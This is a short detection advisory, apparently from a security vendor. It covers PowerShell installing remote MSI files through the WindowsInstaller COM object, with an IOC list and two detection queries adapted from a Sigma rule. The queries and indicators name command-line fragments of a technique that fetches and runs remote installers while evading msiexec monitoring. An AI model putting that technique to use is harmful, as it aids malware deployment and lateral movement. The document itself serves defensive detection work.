Date: 06/26/2025
Severity: Medium
Summary
PowerShell MSI Install Via WindowsInstaller COM From Remote Location refers to the use of PowerShell to install MSI files through the WindowsInstaller.Installer COM object, especially when the files are hosted remotely. This technique may be used by attackers to deploy malware or move laterally while avoiding detection tools that monitor standard installation methods like msiexec.
Indicators of Compromise (IOC) List
Image | '\powershell_ise.exe' '\powershell.exe' '\pwsh.exe' |
OriginalFileName | 'PowerShell_ISE.EXE' 'PowerShell.EXE' 'pwsh.dll' |
CommandLine | '-ComObject' 'InstallProduct(' 'http' '\\\\' '://127.0.0.1' '://localhost' |
Gurucul Threat Detection and Incident Response (TDIR) Queries for Detection
Detection Query 1 : | ((resourcename = "Windows Security" AND eventtype = "4688") AND (processname like "PowerShell_ISE.EXE" OR processname like "PowerShell.EXE" OR processname like "pwsh.dll") AND (commandline not like "://127.0.0.1" AND commandline not like "://localhost") AND (commandline like "-ComObject" AND commandline like "InstallProduct(") AND (commandline like "http" OR commandline like "\\\\") ) |
Detection Query 2 : | technologygroup = "EDR" AND (processname like "PowerShell_ISE.EXE" OR processname like "PowerShell.EXE" OR processname like "pwsh.dll") AND (commandline not like "://127.0.0.1" AND commandline not like "://localhost") AND (commandline like "-ComObject" AND commandline like "InstallProduct(") AND (commandline like "http" OR commandline like "\\\\") |
Reference:
https://github.com/SigmaHQ/sigma/blob/master/rules/windows/process_creation/proc_creation_win_powershell_comobject_msi_remote.yml